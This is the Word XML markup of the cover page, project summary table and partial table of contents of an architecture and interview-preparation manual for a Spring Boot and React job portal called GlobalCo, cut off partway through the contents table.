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after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>GLOBALCO JOB PORTAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Master Project Architecture, Reverse-Engineered Deep Dive &amp; Technical Interview Preparation Manual</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A rigorous, end-to-end technical reference reverse-engineering every component, REST API endpoint, database schema, Spring Security JWT filter, React state lifecycle, business algorithm, and interview defense strategy for the enterprise-grade GlobalCo recruitment platform.</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4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1E3A8A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Project Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GlobalCo Job Portal &amp; Recruitment Management System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1E3A8A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Primary Architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Decoupled 3-Tier Layered Architecture (RESTful Spring Boot + React SPA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1E3A8A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Backend Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Spring Boot 3.4.3 | Java 17/21 | Spring Security 6 | Spring Data JPA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1E3A8A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Frontend Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>React 18.2 | Vite 7 | Tailwind CSS 3.4 | Axios | Lucide React</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1E3A8A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Database &amp; Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>H2 In-Memory DB (with MySQL Connector Compatibility) | Hibernate ORM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1E3A8A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Security Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stateless JWT (HMAC-SHA256) | Role-Based Access Control (RBAC) | BCrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1E3A8A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Target Roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Full-Stack Software Engineer / Senior Backend Engineer / React Specialist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1E3A8A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Document Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Master Technical Notes for End-to-End System Defense &amp; Interview Excellence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="800"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>STRICTLY CONFIDENTIAL — PREPARED EXCLUSIVELY FOR TECHNICAL INTERVIEW PREPARATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Master Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>This master document is structured into 45+ comprehensive, exhaustive sections covering foundational computer science primers, system engineering, architecture, file-by-file code reverse-engineering, UI screen-by-screen visual documentation, button click traces, failure recovery, security, and technical interview defense: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3216"/>
        <w:gridCol w:w="3216"/>
        <w:gridCol w:w="3216"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Curriculum Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Theme / Focus Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Key Deliverables &amp; Architectural Topics Included</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Module 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>System Overview &amp; Foundations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Executive Summary, Project Scope, Beginner Airport Analogy, Real-World Problem, Architectural Solution, User Roles &amp; RBAC Matrix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Module 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Core Architecture &amp; Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Features Breakdown, Complete Directory Tree &amp; Rationale, Technology Stack Deep Dive, 3-Tier System Architecture, Frontend Architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Module 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Foundations Primer (Zero-to-Hero)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Networking Mechanics, HTTP/HTTPS Anatomy, Java 21 &amp; JVM Memory, Spring Boot IoC/DI, Bean Lifecycle, DispatcherServlet Pipeline, React Virtual DOM &amp; Fiber, Relational Theory, Normalization (1NF-3NF), ACID Guarantees, Hibernate Internals, REST Principles, JWT Math, BCrypt Hashing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Module 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Backend &amp; API Specification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Backend Architecture, Database Architecture (3NF), Entity Model &amp; Data Dictionary, Complete 18+ REST API Reference Table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Module 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Controllers &amp; Services Deep Dive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Exhaustive Inspection of All 14 Controllers, All 11 Domain Services, All 13 JPA Entities, All 13 Repositories, and DTO Validation Models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Module 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Security &amp; System Workflows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Authentication Engineering (JWT), Authorization Filter Chain, Feature-by-Feature Deep Dive (6-Part Format), End-to-End Workflows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Module 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Runtime &amp; UI Screen Tour</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
